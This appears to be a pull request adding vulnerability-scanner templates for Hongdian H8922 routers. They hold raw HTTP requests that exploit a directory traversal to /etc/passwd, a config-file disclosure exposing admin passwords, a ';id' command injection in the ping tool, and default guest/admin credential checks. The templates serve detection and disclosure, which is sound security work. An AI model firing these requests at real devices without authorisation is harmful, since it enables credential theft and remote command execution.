### PR TITLE
Create Hongdian Vulnerability

### DIFF
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -1,0 +1,56 @@
+id: CVE-2021-28149
+
+info:
+  name: Hongdian Directory Traversal
+  author: gy741
+  severity: medium
+  description: |
+      Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+  reference: |
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
+  tags: cve,cve2021,hongdian,traversal
+
+requests:
+  - raw:
+      - |
+        GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+      - |
+        GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/octet-stream"
+        part: header
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "sshd:[x*]"
+          - "root:[$]"
+        part: body

--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -7,7 +7,7 @@ info:
   description: |
       Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
   reference: |
-    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
   tags: cve,cve2021,hongdian,traversal
 

--- a/cves/2021/CVE-2021-28150.yaml
+++ b/cves/2021/CVE-2021-28150.yaml
@@ -7,7 +7,7 @@ info:
   description: |
     Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
   reference: |
-    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
   tags: cve,cve2021,hongdian,exposures
 
@@ -51,5 +51,5 @@ requests:
       - type: word
         words:
           - "CLI configuration saved from vty"
-          - "service webadmin"  
+          - "service webadmin"
         part: body

--- a/cves/2021/CVE-2021-28150.yaml
+++ b/cves/2021/CVE-2021-28150.yaml
@@ -1,0 +1,55 @@
+id: CVE-2021-28150
+
+info:
+  name: Hongdian Sensitive Information
+  author: gy741
+  severity: medium
+  description: |
+    Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
+  reference: |
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
+  tags: cve,cve2021,hongdian,exposures
+
+requests:
+  - raw:
+      - |
+        GET /backup2.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+      - |
+        GET /backup2.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "application/octet-stream"
+        part: header
+
+      - type: word
+        words:
+          - "CLI configuration saved from vty"
+          - "service webadmin"  
+        part: body

--- a/cves/2021/CVE-2021-28151.yaml
+++ b/cves/2021/CVE-2021-28151.yaml
@@ -7,7 +7,7 @@ info:
   description: |
     Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
   reference: |
-    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-28151
   tags: cve,cve2021,hongdian,rce
 
@@ -63,5 +63,6 @@ requests:
       - type: word
         words:
           - "uid="
-          - "gid="  
+          - "gid="
         part: body
+        condition: and

--- a/cves/2021/CVE-2021-28151.yaml
+++ b/cves/2021/CVE-2021-28151.yaml
@@ -1,0 +1,67 @@
+id: CVE-2021-28151
+
+info:
+  name: Hongdian Command Injection
+  author: gy741
+  severity: high
+  description: |
+    Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.
+  reference: |
+    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28151
+  tags: cve,cve2021,hongdian,rce
+
+requests:
+  - raw:
+      - |
+        POST /tools.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 85
+        Cache-Control: max-age=0
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+        Upgrade-Insecure-Requests: 1
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Referer: http://{{Hostname}}/tools.cgi
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+        op_type=ping&destination=%3Bid
+
+      - |
+        POST /tools.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 85
+        Cache-Control: max-age=0
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Upgrade-Insecure-Requests: 1
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Referer: http://{{Hostname}}/tools.cgi
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+        op_type=ping&destination=%3Bid
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: word
+        words:
+          - "uid="
+          - "gid="  
+        part: body

--- a/default-logins/hongdian/hongdian-default-password.yaml
+++ b/default-logins/hongdian/hongdian-default-password.yaml
@@ -1,0 +1,49 @@
+id: hongdian-default-password
+
+info:
+  name: Hongdian Default Credentials
+  author: gy741
+  severity: high
+  tags: hongdian,default-login
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: word
+        words:
+          - "status_main.cgi"
+        part: body
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

I added several vulnerabilities that occur in Hongdian.

Please refer to the reference for detailed vulnerability information.

- CVE-2021-28149 : Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.

- CVE-2021-28150 : Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.

- CVE-2021-28151 : Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest.

- References: https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ 

### Template Validation

I've validated this template locally?
- [v] YES

This template has been tested.

